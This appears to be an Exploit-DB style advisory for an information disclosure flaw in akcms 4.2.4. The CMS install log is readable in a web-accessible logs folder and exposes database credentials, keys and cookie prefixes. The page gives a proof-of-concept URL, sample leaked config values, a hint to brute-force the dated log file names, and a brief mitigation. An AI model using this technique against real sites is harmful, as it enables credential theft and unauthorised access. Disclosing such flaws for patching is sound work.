header-logo
Suggest Exploit
vendor:
akcms
by:
L0n3ly-H34rT
N/A
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: akcms
Affected Version From: 4.2.2004
Affected Version To: 4.2.2004
Patch Exists: NO
Related CWE:
CPE: a:akcms:akcms:4.2.4
Metasploit:
Other Scripts:
Platforms Tested: Linux, Windows
2012

akcms v4.2.4 Information Disclosure Vulnerability

When you install script as first time, it will be generate file log & if we enter here for example :http://127.0.0.1/akcms4.2.4/logs/we see two files log:1- for config log e.g. :20120910.log2- for failed login e.g. :admin20120910.logif we see first file, we see the name of file as the date when install script, but if we enter the folder and permission of index is on, we can read it ..or we can brute force of that file by some programmer found in google or you can generate simple script for yourself ..# P.O.C :http://127.0.0.1/akcms4.2.4/logs/20120910.logyou will see the information of config like this for example :16:57:56 127.0.0.1 file=install $dbtype = 'mysql';$dbhost = 'localhost';$dbuser = 'root';$dbpw = '000000';$dbname = 'ak';$tablepre = 'ak';$charset = 'utf8';$timedifference = '0';$template_path = 'ak';$codekey = 'snGrZU';$cookiepre = '9x5G74';

Mitigation:

Fix permissions on the log folder to prevent unauthorized access. Remove any sensitive information from the log files.
Source

Exploit-DB raw data:

############################################
### Exploit Title: akcms v4.2.4 Information Disclosure Vulnerability
### Date: 10/09/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.akcms.com/
### Software Link: http://download.akcms.com/download/akcms4.2.4.tar.gz
### Version: 4.2.4 ( may be old version is affect ! i don't check )
### Tested on: Linux/Windows 
############################################

# Explanation :

When you install script as first time, it will be generate file log & if we enter here for example :

http://127.0.0.1/akcms4.2.4/logs/

we see two files log:

1- for config log e.g. :

20120910.log

2- for failed login e.g. :

admin20120910.log

if we see first file, we see the name of file as the date when install script, but if we enter the folder and permission of index is on, we can read it ..

or we can brute force of that file by some programmer found in google or you can generate simple script for yourself ..

# P.O.C :

http://127.0.0.1/akcms4.2.4/logs/20120910.log

you will see the information of config like this for example :

16:57:56    127.0.0.1    file=install    $dbtype = 'mysql';
$dbhost = 'localhost';
$dbuser = 'root';
$dbpw = '000000';
$dbname = 'ak';
$tablepre = 'ak';
$charset = 'utf8';
$timedifference = '0';
$template_path = 'ak';
$codekey = 'snGrZU';
$cookiepre = '9x5G74';


############################################

# Greetz to my friendz